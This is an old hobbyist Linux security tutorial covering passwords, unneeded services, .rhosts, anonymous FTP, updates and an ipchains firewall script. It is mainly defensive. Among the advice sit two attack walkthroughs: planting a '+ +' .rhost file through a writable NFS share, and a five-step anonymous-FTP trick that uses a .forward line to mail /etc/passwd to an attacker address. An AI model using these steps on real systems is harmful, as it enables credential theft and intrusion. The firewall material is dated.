Synfire's Quick Guide to Linux

Securing Your Linux Box

"You are only as strong as your weakest link of defence." - Unknown

This text won't go into setting up LANS or WAN that you would do if you were running a large network that needs as much security as fort Knox, but it does go into things that the average user connecting to the internet should do. ( It is a VERY good idea to install a firewall of some sort, I prefer Bastille, on every computer that you connect to the internet. ) This section is seperated into subsections, numbered for ease of use.

1) Passwords.

Unfortunately, an uncrackable password does not exist. Any password, given time and effort, can be guessed either through brute force, algorithm translation programs (ATP), or social engineering. Since password cracking can be really time consuming, make it hard for any attacker who has grabbed your password file.

Running a password cracker on a daily basis on your system is a good start. This helps to find and replace passwords that are easily guessed. Also, a password checking program should be present to reject a weak passwords when choosing a password or changing an old one. Character strings that are plain dictionary words, or do not contain digits or special characters should not be accepted. A good password strategy should be made and enforced. The best strategy I have seen was when I was working at a Cyber Crime agency that I will keep nameless for my own security purposes. They would have thier employees pick a phrase from the employees religious text, such as "Eight words the wiccan rede fulfill, An ye harm none do as ye will!" and take the first letter of each word, "ewtwrfayhndayw" and insert your work ID number in a pattern, "ew4tw1rf5ay0hn4da2yw", and with a jumbled mesh like this that the employees could remember, this strongly increased security of the whole company.

Word lists, also known as dictionary files, that can be fed into a password cracker can be easily gotten on the Internet. These files usually contain usernames, real world words, and numerical patterns. None that I have seen contains words like "ew4tw1rf5ay0hn4da2yw". But there are more advanced password crackers that contain an Incremental Cracking Mode, that will guess every combination of every letter, digit, and special character until the password is found. As you could guess this would take an enormous amount of time and usually an attacker would much rather go after an easier target than spend that much time on one user account.

2) Running Services

Another big threat against a computers security is having services running that are not really needed. By default many distro's of Linux have HTTP, FTP, SMB, Sendmail, and many other sevices running right from the beginning. When I install a distribution the first thing I do is run a portscanner, I suggest NMAP, on the system to see all services running. To do so using NMAP try typing:

nmap -sS 127.0.0.1

This will display a list of all open ports on your system including the name of the service. Once you find all the services that are running decide which ones that you want and close all the rest. NOTE: Unless you SERIOUSLY need it always disable Sendmail.

Sendmail is one of the biggest security risks in Linux/Unix Operating Systems and I usually totally delete it off of the system I am installing. But if you want to keep the service but don't want it running type "ps aux | grep" to display all the process ID's (PID) of everything running. Then, once you have the running services PID all you have to do is type "kill -9 >PID<" and enter. Another thing to do is to comment out the services in your start-up scripts so they wont be turned back on when your computer restarts.

3) .rhost

Using .rhost files is a big security risk and they should not be used. When I was working for a Tiger Team ( a group of hackers that companies pay to break into thier computers and give advice on security ) one of my favorite attacks used .rhost. This took advantage of the user running a poorly configured NFS service.

I would find out what file systems the user had running then look to see if any were word writable ( do this on your computer by typing 'showmount -e' ) once I found a word writable file system, I would mount my computer to it and place a .rhost file with '+ +' as the first line into a users home directory. Then all I had to do is telenet to the victim computer and enter the users name that I planted the .rhost file in and the system was compromised.

4) Anon FTP

Disable anonymous FTP servers. Unless you are very, very carefull an attacker can easily get your password file and as discribed earlier can then crack your passwords. Anon FTP can be easily cracked like so:

  1. Create a fake .forward file that has the following command in it:
    • |/bin/mail attacker@email.com < /etc/passwd
  2. Connect to the victim through FTP and log in as user FTP.
  3. Enter any password you wish.
  4. Upload the .forward file you have created.
  5. Log out and send mail to ftp@victim.machine.com.

Sit back as victim.machine.com e-mails you a copy of its local password file

In five steps that take about two minutes to complete ( depending on the attacker's modem speed ) the attacker has a copy of your password file that he/she will slowly but surely decypher and your system will be compromised. My rule of thumb is to never run Anonymous FTP Daemons but if you really want to, here is a list of rules that should help your run a fairly safe Anonymous FTP Daemon:

  1. Only the /incoming directory should be made writable and only by root and user FTP.
  2. Anonymous FTP users should have only executable (and read) access to the /pub and the /incoming directory.
  3. FTP users should NOT be able to write to /ftp.

5) Linux Updates

Keep up to date with all the latest exploits and security issues that come out. There are many news groups that you could join that would send you information on the latest security issues available. Hackers read these and you should too! My favorite of all these and the best out there is the Computer Emergency Responce Team ( CERT ) you can learn all about security there and they keep very up to date.

Here are a few security related links you should check out:

  1. CERT Advisories
  2. Information Systems Security
  3. Anti-Online - "The hackers know, shouldn't you?"
6) Security Configuration Script

Normally I don't add anything anyone else writes to my texts, but this was a great script for setting up a quick network security, If you plan to use your Linux box as a Network Router or Gateway, then I suggest you read his tutorial called, Ghost_Rider's Linux Networking Tutorial at http://blacksun.box.sk.

   #!/bin/sh
   # Example ipchains Script
   # By Ghost_Rider
   # For linux networking tutorial

   IPCHAINS="/sbin/ipchains"
   DNSSERVER="PUT UR DNS SERVER HERE"
   
   # flush rules
   
   $IPCHAINS -F input
   $IPCHAINS -F output
   $IPCHAINS -F forward
   
   # Set policies
 
   $IPCHAINS -P input DENY
   $IPCHAINS -P output accept
   $IPCHAINS -P forward DENY
   
   # Accept all local traffic
    
   $IPCHAINS -A input -i lo -j ACCEPT
   $IPCHAINS -A input -i eth0 -j ACCEPT
   
   # Deny private address comming from ppp0
   # Attemps of spoof to use our host to masquerade
   
   $IPCHAINS -A input -i ppp0 -s 10.0.0.0/8 -j DENY
   $IPCHAINS -A input -i ppp0 -s 172.16.0.0/12 -j DENY
   $IPCHAINS -A input -i ppp0 -s 192.168.0.0/24 -j DENY
   
   # Let's set IP Masquerading
   
   echo "1" > /proc/sys/net/ipv4/ip_forward
   $IPCHAINS -A forward -s 192.168.0.0/24 -d ! 192.168.0.0/24 -j MASQ
   
   #  Allow DNS
   
   $IPCHAINS -A input -i ppp0 -p tcp -s $DNSSERVER --sport 53 -j ACCEPT
   $IPCHAINS -A input -i ppp0 -p udp -s $DNSSERVER --sport 53 -j ACCEPT
   
   # Reject auth so you don't have to wait till timeout when sending mails
   
   $IPCHAINS -A input -i ppp0 -p tcp --dport 113 -j REJECT
   
   # Allowing ICMPs necessary
   # 0 = echo reply
   # 3 = Destination unreachable
   # 11 = time exceeded
   
   $IPCHAINS -A input -i ppp0 -p icmp --dport 0 -j ACCEPT
   $IPCHAINS -A input -i ppp0 -p icmp --dport 3 -j ACCEPT
   $IPCHAINS -A input -i ppp0 -p icmp --dport 11 -j ACCEPT
   
   # Log everything else..
   # Let's see what is on the next door
   
   $IPCHAINS -A input -i ppp0 -j DENY -l

Where to get a Linux or Unix Operating System?

FreeBSD - A Free Secure version of Unix.
Slackware Linux - A Free Powerful distro of Linux.
PhatLinux - A Free Linux distro that can be ran on a Windows partion.
PicoBSD - A Small version of FreeBSD that can be ran from a floppy disk!

Contact me here.

< < < Lesson 5: Connecting to the internet



Want some naughty smileys for your Yahoo messenger? Then look HERE.